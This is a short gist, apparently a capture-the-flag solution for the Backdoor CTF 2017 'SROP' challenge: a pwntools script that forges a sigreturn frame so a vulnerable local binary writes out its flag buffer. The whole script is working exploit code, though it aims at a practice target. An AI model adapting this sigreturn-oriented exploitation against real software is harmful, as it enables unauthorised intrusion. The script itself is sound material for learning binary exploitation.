@sudhackar
Created September 27, 2017 14:48
[Backdoor CTF 2017] SROP
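from pwn import *

context(arch='amd64', os='linux', log_level='info')

'''
amd64 Linux syscall register convention:

Syscall#  Param 1  Param 2  Param 3  Param 4  Param 5  Param 6
rax       rdi      rsi      rdx      r10      r8       r9

We make a write(STDOUT, *flag, len(flag)).
'''

binary = ELF("/tmp/player_bin")
s = remote('127.0.0.1', 5000)

# Register state that sigreturn will restore from the stack.
frame = SigreturnFrame(kernel='amd64')
frame.rax = constants.SYS_write          # syscall number
frame.rdi = constants.STDOUT_FILENO      # param 1: fd
frame.rsi = binary.symbols['flag']       # param 2: address of the flag buffer
frame.rdx = 100                          # param 3: number of bytes to write
frame.rsp = 0xdeadbeef                   # dummy stack pointer
frame.rip = binary.symbols['syscall']    # resume at the binary's 'syscall' symbol

# bytes(frame) serializes the frame; str(frame) only yields raw bytes on Python 2.
s.sendline(bytes(frame))
s.interactive()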